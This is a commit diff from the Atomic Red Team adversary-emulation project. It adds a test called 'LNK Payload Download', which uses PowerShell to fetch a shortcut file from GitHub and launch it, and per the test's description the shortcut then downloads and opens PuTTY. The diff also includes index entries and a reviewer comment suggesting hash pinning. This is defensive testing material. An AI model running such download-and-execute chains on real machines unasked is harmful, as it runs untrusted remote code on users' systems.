Generated docs from job=generate-docs branch=master [ci skip]

This commit is contained in:
Atomic Red Team doc generator
2022-05-06 04:43:44 +00:00
parent 5f77bdd0c5
commit a5ca285de1
6 changed files with 64 additions and 0 deletions
+1
@@ -1024,6 +1024,7 @@ execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d
execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
1024 execution T1204.002 Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
1025 execution T1204.002 Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
1026 execution T1204.002 Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
1027 execution T1204.002 Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
1028 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
1029 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
1030 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
@@ -743,6 +743,7 @@ execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d
execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
execution,T1204.002,Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
743 execution T1204.002 Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
744 execution T1204.002 Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
745 execution T1204.002 Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
746 execution T1204.002 Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
747 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
748 execution T1059.001 PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
749 execution T1059.001 PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
@@ -1673,6 +1673,7 @@
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1106 Native API](../../T1106/T1106.md)
@@ -1220,6 +1220,7 @@
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
+19
@@ -68868,6 +68868,25 @@ execution:
-ErrorAction Ignore
'
- name: LNK Payload Download
auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f
description: This lnk files invokes powershell to download putty from the internet
and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
supported_platforms:
- windows
executor:
command: |
Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
$file1 = "$env:Temp\test10.lnk"
Start-Process $file1
Start-Sleep -s 10
taskkill /IM a.exe /F
cleanup_command: |-
$file1 = "$env:Temp\test10.lnk"
$file2 = "$env:Temp\a.exe"
Remove-Item $file1 -ErrorAction Ignore
Remove-Item $file2 -ErrorAction Ignore
name: powershell
T1204.003:
technique:
object_marking_refs:
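Review bot: The `command:` block launches `test10.lnk` straight from a raw `master` URL with no integrity check, so the shortcut that actually runs — and, per the description line, the PuTTY binary it then fetches — is whatever those remote locations serve at run time rather than a reviewed artifact. Pinning the download URL to a commit SHA and verifying the file before it is opened, e.g. `if ((Get-FileHash $file1 -Algorithm SHA256).Hash -ne '<expected-sha256>') { throw 'test10.lnk hash mismatch' }` inserted just before `Start-Process $file1`, makes the test reproducible and stops a tampered upstream file from executing on the test host. `taskkill /IM a.exe /F` terminates every process named `a.exe` on the machine and the cleanup's `Remove-Item "$env:Temp\a.exe"` assumes a drop location the hunk does not show (the .lnk contents are not in the diff), so both should be stated as assumptions in the description, which also has a typo (`This lnk files invokes` → `This .lnk file invokes`). Since this index is generated, these changes belong in the source atomic YAML (presumably under `atomics/T1204.002/`, as the download URL suggests), not here; the enclosing `execution:` mapping continues outside the hunk.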
+41
@@ -26,6 +26,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
- [Atomic Test #9 - Office Generic Payload Download](#atomic-test-9---office-generic-payload-download)
- [Atomic Test #10 - LNK Payload Download](#atomic-test-10---lnk-payload-download)
<br/>
@@ -584,4 +586,43 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
<br/>
<br/>
## Atomic Test #10 - LNK Payload Download
This lnk files invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
**Supported Platforms:** Windows
**auto_generated_guid:** 581d7521-9c4b-420e-9695-2aec5241167f
#### Attack Commands: Run with `powershell`!
```powershell
Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
$file1 = "$env:Temp\test10.lnk"
Start-Process $file1
Start-Sleep -s 10
taskkill /IM a.exe /F
```
#### Cleanup Commands:
```powershell
$file1 = "$env:Temp\test10.lnk"
$file2 = "$env:Temp\a.exe"
Remove-Item $file1 -ErrorAction Ignore
Remove-Item $file2 -ErrorAction Ignore
```
<br/>